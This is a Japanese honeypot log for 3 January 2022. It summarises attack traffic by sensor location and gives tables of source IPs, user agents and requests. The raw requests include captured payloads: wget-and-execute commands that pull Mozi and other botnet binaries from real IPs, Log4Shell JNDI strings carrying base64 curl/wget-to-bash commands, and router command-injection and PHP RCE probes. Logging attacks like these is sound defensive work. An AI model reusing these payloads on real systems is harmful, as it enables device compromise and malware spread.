ハニーポット(仮) 観測記録 2022/01/03分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Location:JP
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
phpMyAdminへのスキャン行為
161.97.119.209に関する不正通信
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://27.210.94.177:44601/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.envへのスキャン行為
Laravelへのスキャン行為
Gh0stRATのような動き
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.192.216.45/bins/arm; chmod 777 /tmp/arm; sh /tmp/arm selfrep.jaws
cd /tmp; rm -rf *; wget 212.192.216.46/bins/arm; chmod 777 /tmp/arm; sh /tmp/arm selfrep.jaws
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
gbrmssによるスキャン行為
zgrabによるスキャン行為
Laravelへのスキャン行為
161.97.119.209に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
gbrmssによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
161.97.119.209に関する不正通信
5.188.210.227に関する不正通信
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.192.216.46/bins/arm; chmod 777 /tmp/arm; sh /tmp/arm selfrep.jaws
他
アクセス数推移
JP:総アクセス数:216 (前日比:42)
US:総アクセス数:40 (前日比:-51)
UK:総アクセス数:36 (前日比:-40)
SG:総アクセス数:105 (前日比:38)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 5.188.210.227 | Russia |
1 | 20.111.10.250 | United States |
1 | 20.115.18.23 | United States |
1 | 20.124.234.86 | United States |
1 | 20.199.88.66 | United States |
1 | 27.210.94.177 | China |
1 | 34.106.207.46 | United States |
1 | 34.213.195.218 | United States |
33 | 40.65.99.132 | United States |
1 | 41.251.249.88 | Morocco |
1 | 45.83.66.159 | Germany |
1 | 45.146.165.168 | Russia |
1 | 52.235.35.202 | United States |
1 | 66.249.64.22 | United States |
7 | 92.118.234.202 | Latvia |
4 | 94.102.49.190 | United Kingdom |
1 | 103.170.92.67 | India |
1 | 107.130.226.93 | United States |
1 | 109.237.103.9 | Russia |
101 | 110.87.25.20 | China |
1 | 128.14.209.162 | United States |
7 | 132.145.39.16 | United States |
12 | 135.125.246.110 | France |
2 | 139.59.226.134 | Singapore |
1 | 143.244.189.0 | United States |
3 | 147.182.195.163 | United States |
1 | 147.182.232.128 | United States |
7 | 148.153.51.254 | United States |
1 | 159.203.22.47 | United States |
1 | 165.227.131.62 | United States |
1 | 165.232.137.148 | United States |
1 | 167.86.80.154 | Germany |
1 | 172.104.138.223 | United States |
1 | 178.239.21.70 | Poland |
1 | 185.44.81.176 | Switzerland |
4 | 185.254.196.217 | Ukraine |
2 | 185.254.196.218 | Ukraine |
1 | 192.241.208.238 | United States |
1 | 192.241.212.147 | United States |
1 | 195.154.63.222 | France |
1 | 209.17.96.210 | United States |
4 | 209.141.53.74 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
23 | - |
7 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
33 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
34 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html) |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \n |
||
1 | \x16\x03\x01\x01\xfa\x01 |
||
8 | \x16\x03\x01 |
||
1 | CONNECT | 161[.]97[.]119[.]209:7144 |
HTTP/1.1 |
1 | CONNECT | acerta[.]bvsnet[.]com[.]br:443 |
HTTP/1.0 |
36 | GET | /.env |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /_configurator/final |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
2 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /app/config/.env |
HTTP/1.1 |
1 | GET | /app_dev.php/_profiler/latest |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /audio/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /base/.env |
HTTP/1.1 |
1 | GET | /blog/.env |
HTTP/1.1 |
1 | GET | /cgi-bin/.env |
HTTP/1.1 |
1 | GET | /conf/.env |
HTTP/1.1 |
1 | GET | /config/.env |
HTTP/1.1 |
4 | GET | /config/getuser?index=0 |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /crm/.env |
HTTP/1.1 |
1 | GET | /database/.env |
HTTP/1.1 |
1 | GET | /ec2-18-179-20-5.ap-northeast-1.compute.amazonaws.com/.env |
HTTP/1.1 |
3 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /fuN3 |
HTTP/1.0 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /library/.env |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /login/.env |
HTTP/1.1 |
1 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /newsite/.env |
HTTP/1.1 |
1 | GET | /old/.env |
HTTP/1.1 |
101 | GET | /phpmyadmin/ |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
2 | GET | /public/.env |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]210[.]94[.]177:44601/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /sites/all/libraries/mailchimp/.env |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
2 | GET | /storage/.env |
HTTP/1.1 |
2 | GET | /vendor/.env |
HTTP/1.1 |
1 | GET | /vendor/laravel/.env |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wp-admin/.env |
HTTP/1.1 |
1 | GET | /wp-content/.env |
HTTP/1.1 |
1 | GET | /www/.env |
HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php |
HTTP/1.1 |
7 | GET | http[:]//azenv[.]net/ |
HTTP/1.1 |
1 | POST | /./RestAPI/LogonCustomization |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 34.213.195.218 | United States |
1 | 45.146.166.188 | Russia |
5 | 51.79.29.48 | Canada |
1 | 52.229.110.30 | United States |
1 | 66.240.205.34 | United States |
1 | 82.76.228.117 | Romania |
5 | 92.118.234.202 | Latvia |
1 | 115.194.43.232 | China |
1 | 117.215.249.64 | India |
1 | 137.184.221.114 | United States |
1 | 143.110.227.92 | United States |
1 | 143.244.189.0 | United States |
1 | 147.182.195.163 | United States |
1 | 165.232.137.148 | United States |
3 | 165.232.142.210 | United States |
1 | 192.53.117.20 | United States |
8 | 195.54.160.149 | Russia |
1 | 198.98.49.124 | United States |
4 | 209.141.53.74 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
1 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo} |
6 | - |
5 | Go-http-client/1.1 |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
14 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad |
||
1 | \x03 |
||
16 | GET | /.env |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo} |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
5 | GET | /config/getuser?index=0 |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]215[.]249[.]92:45883/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws |
|
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.46/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws |
|
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
5 | GET | http[:]//azenv[.]net/ |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 34.106.207.46 | United States |
1 | 35.245.141.88 | United States |
1 | 45.83.64.191 | Germany |
8 | 92.118.234.202 | Latvia |
2 | 94.232.43.63 | Russia |
1 | 128.14.134.134 | United States |
2 | 157.245.70.127 | United States |
1 | 171.38.151.41 | China |
1 | 185.44.81.176 | Switzerland |
1 | 192.241.193.110 | United States |
1 | 192.241.195.226 | United States |
10 | 195.54.160.149 | Russia |
1 | 196.11.178.136 | South Africa |
1 | 209.17.96.58 | United States |
4 | 209.141.53.74 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=} |
7 | - |
8 | Go-http-client/1.1 |
1 | Hello, World |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 zgrab/0.x |
1 | gbrmss/7.29.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
2 | \x03 |
||
1 | \x16\x03\x01 |
||
1 | CONNECT | 161[.]97[.]119[.]209:7144 |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
2 | GET | /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=} |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin/config.php |
HTTP/1.1 |
4 | GET | /config/getuser?index=0 |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
8 | GET | http[:]//azenv[.]net/ |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.57.121.38 | Romania |
1 | 5.188.210.227 | Russia |
2 | 20.127.17.27 | United States |
1 | 23.251.102.74 | United States |
1 | 34.86.90.146 | United States |
1 | 34.213.195.218 | United States |
1 | 35.203.172.16 | United States |
33 | 40.65.99.132 | United States |
1 | 41.251.249.88 | Morocco |
3 | 43.128.203.37 | Singapore |
1 | 45.83.66.169 | Germany |
1 | 45.146.165.168 | Russia |
6 | 51.79.29.48 | Canada |
1 | 51.81.193.224 | United States |
1 | 52.235.35.202 | United States |
7 | 92.118.234.202 | Latvia |
2 | 94.232.43.63 | Russia |
1 | 120.85.115.81 | China |
1 | 122.117.236.40 | Taiwan |
7 | 132.145.39.16 | United States |
1 | 139.59.26.81 | Singapore |
1 | 139.59.79.136 | Singapore |
1 | 143.244.189.0 | United States |
1 | 147.182.195.163 | United States |
3 | 165.232.137.148 | United States |
1 | 172.104.138.223 | United States |
1 | 180.149.125.165 | Mongolia |
1 | 182.122.254.31 | China |
1 | 185.44.81.176 | Switzerland |
1 | 192.241.212.19 | United States |
1 | 193.23.3.121 | Russia |
10 | 195.54.160.149 | Russia |
1 | 198.98.49.124 | United States |
1 | 209.17.97.58 | United States |
4 | 209.141.53.74 | United States |
3 | 212.47.244.68 | France |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo} |
21 | - |
7 | Go-http-client/1.1 |
1 | Java/1.8.0_311 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
33 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 |
14 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | gbrmss/7.29.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
2 | \x03 |
||
2 | \x16\x03\x01\x01\xfb\x01 |
||
4 | \x16\x03\x01 |
||
2 | CONNECT | 161[.]97[.]119[.]209:7144 |
HTTP/1.1 |
1 | CONNECT | ver[.]movistarplus[.]es:443 |
HTTP/1.1 |
1 | CONNECT | www[.]bing[.]com:443 |
HTTP/1.1 |
18 | GET | /.env |
HTTP/1.1 |
1 | GET | /13.67.44.234/.env |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
2 | GET | /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo} |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /admin/config.php |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
2 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /app/config/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /audio/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /base/.env |
HTTP/1.1 |
1 | GET | /blog/.env |
HTTP/1.1 |
1 | GET | /c/ |
HTTP/1.1 |
1 | GET | /cgi-bin/.env |
HTTP/1.1 |
1 | GET | /conf/.env |
HTTP/1.1 |
1 | GET | /config/.env |
HTTP/1.1 |
5 | GET | /config/getuser?index=0 |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /crm/.env |
HTTP/1.1 |
1 | GET | /database/.env |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /fuN3 |
HTTP/1.0 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /library/.env |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /login/.env |
HTTP/1.1 |
1 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /newsite/.env |
HTTP/1.1 |
1 | GET | /old/.env |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
2 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.46/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws |
|
1 | GET | /sites/all/libraries/mailchimp/.env |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
2 | GET | /storage/.env |
HTTP/1.1 |
2 | GET | /vendor/.env |
HTTP/1.1 |
1 | GET | /vendor/laravel/.env |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wp-admin/.env |
HTTP/1.1 |
1 | GET | /wp-content/.env |
HTTP/1.1 |
1 | GET | /wp-content/ |
HTTP/1.1 |
1 | GET | /www/.env |
HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php |
HTTP/1.1 |
7 | GET | http[:]//azenv[.]net/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ |
HTTP/1.1 |
1 | POST | /./RestAPI/LogonCustomization |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | http[:]//mariechestnut[.]website/1b9e1c9a1d5f9e5243c62dc28ffe150d9abe84836a5d50ce39c4d0da17c00e61fd4cf0298878a6eadb7f4fbe332bd99d6de50e0f54a411c112d4c856b74ef547b7255eccf6bc9c16bb29454fa7504fd41f37c17e68bd44f1368486c6195d1157 |
HTTP/1.1 |